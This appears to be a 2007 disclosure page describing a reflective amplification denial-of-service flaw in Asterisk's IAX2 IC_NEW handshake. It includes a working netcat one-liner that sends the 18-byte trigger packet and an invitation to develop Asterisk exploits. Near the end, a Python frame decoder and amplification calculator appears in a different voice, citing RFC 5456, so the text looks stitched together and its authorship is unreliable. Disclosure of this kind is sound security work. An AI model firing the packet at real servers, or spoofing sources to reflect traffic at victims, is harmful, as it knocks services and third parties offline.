IAX2 protocol flaw in IC_NEW could cause reflective amplification DoS


by Joel R. Voss a.k.a. Javantea
jvoss@altsci.com
jvoss@myuw.net
May 15, 2007
Official Asterisk bug report

UPDATE April 18, 2008

I am releasing the full Asterisk IAX2 exploit framework / alternative implementation. I am giving a talk at Toorcon Seattle 2008 about my findings. Read more about the handshake (and its failure) at that page.

UPDATE Jan 17, 2008

Although the Asterisk team described a bugfix and mentioned intention to fix this bug, this bug has not been fixed as of Jan 17, 2008 (Tested against 1.4.17). Since the exploit code is widely available through this website, it would seem prudent to fix this if it were indeed a fixable bug. However, it is my opinion that introducing a handshake requirement to the IAX2 protocol would make the protocol far less likely to work with third-party software and hardware.

I am running a vulnerable version at suzy.altsci.com for test (as well as development and actual use) and I intend to keep it running for the purpose of education and disclosure of this vulnerability.

DESCRIPTION

The IAX2 protocol allows an IC_NEW packet to start a call. This is a UDP packet that is only 18 bytes long. A call can be quite long and contains a lot of data. Specifically, my simple answering machine sends 26307 bytes in 723 packets in 32.0032 seconds. That is 6576.75 bits per second. Using uLaw or another higher-bitrate codec, this rate can be increased.

Since UDP source addresses can be spoofed, it seems possible that an Asterisk server can be tricked into sending megabits per second (until it chokes) at a target with a very low cost to the attacker (one 18-byte UDP packet). I have not tested spoofing an address, but I suspect that it will work.

Since this is a protocol flaw and there are hardware implementations that would be broken by changing the protocol, this does not seem to be fixable. If someone with knowledge of these types of issues could discuss this with me, I would be much more confident in this.

I wrote a Python implementation of the IAX2 protocol to fuzz the IAX2 protocol and I found this by accident in my first test. If you are interested in fuzzing the IAX2 protocol, I would be happy to share my code with you. I even have a GSM decoder for the project which lets you hear what the fuzzer made the Asterisk box do.

REQUIREMENTS

You need netcat to run the exploit below.
You might need these to research this further:
tcpdump and libpcap
Wireshark

METHODS

More detailed information coming soon.
Until then, look at the latest internet draft.

USAGE
echo -ne '\x80\xeb\x00\x00\x00\x00\x00\x07\x00\x00\x06\x01\x08\x04\x00\x00\x02\xaa' | nc -u 192.168.0.3 4569
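As an added example (not the author's fuzzer and not Asterisk code), the Python below decodes the 18-byte frame from the USAGE line according to the IAX2 full-frame layout (RFC 5456, the published form of the internet draft referenced above) and computes the request-to-response amplification ratio from the figures in the DESCRIPTION. The IE name table is taken from RFC 5456; the `is_new_request` heuristic and the function names are mine.

```python
import struct

# The 18-byte IAX2 full frame quoted in the USAGE section of this page.
NEW_PACKET = bytes.fromhex("80eb000000000007000006010804000002aa")

# RFC 5456: frame type 6 is an IAX control frame; subclass 1 of that type is NEW.
FRAME_TYPE_IAX = 6
IAX_SUBCLASS_NEW = 1
# Information element (IE) types from RFC 5456 section 8.6 (subset).
IE_NAMES = {1: "CALLED NUMBER", 6: "USERNAME", 8: "CAPABILITY", 9: "FORMAT", 11: "VERSION"}


def parse_full_frame(pkt: bytes) -> dict:
    """Decode the 12-byte IAX2 full-frame header and the IEs that follow it."""
    if len(pkt) < 12:
        raise ValueError("too short for an IAX2 full frame")
    scall, dcall, ts, oseq, iseq, ftype, sub = struct.unpack("!HHIBBBB", pkt[:12])
    if not scall & 0x8000:
        raise ValueError("F bit clear: this is a mini frame, not a full frame")
    ies = {}
    body = pkt[12:]
    while body:
        # Each IE is: 1 byte type, 1 byte length, then that many bytes of data.
        if len(body) < 2 or len(body) < 2 + body[1]:
            raise ValueError("truncated information element")
        ie_type, ie_len = body[0], body[1]
        ies[IE_NAMES.get(ie_type, f"IE {ie_type}")] = body[2:2 + ie_len]
        body = body[2 + ie_len:]
    return {
        "src_call": scall & 0x7FFF,          # F bit stripped
        "retransmit": bool(dcall & 0x8000),  # R bit
        "dst_call": dcall & 0x7FFF,
        "timestamp": ts,
        "oseqno": oseq,
        "iseqno": iseq,
        "frame_type": ftype,
        "subclass": sub & 0x7F,              # C bit stripped
        "ies": ies,
    }


def is_new_request(frame: dict) -> bool:
    """An unsolicited NEW: IAX control frame, subclass NEW, no destination call yet."""
    return (frame["frame_type"] == FRAME_TYPE_IAX
            and frame["subclass"] == IAX_SUBCLASS_NEW
            and frame["dst_call"] == 0)


def amplification_factor(request_bytes: int, response_bytes: int) -> float:
    """Bytes the reflector emits per byte the sender spent on the request."""
    return response_bytes / request_bytes
```

With the page's numbers, amplification_factor(18, 26307) is 1461.5: the server sends back more than a thousand times what it received, which is the property that makes a spoofed source address worth worrying about.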

More detailed information coming soon. If you're interested in developing Asterisk exploits, e-mail me with or without GnuPG.
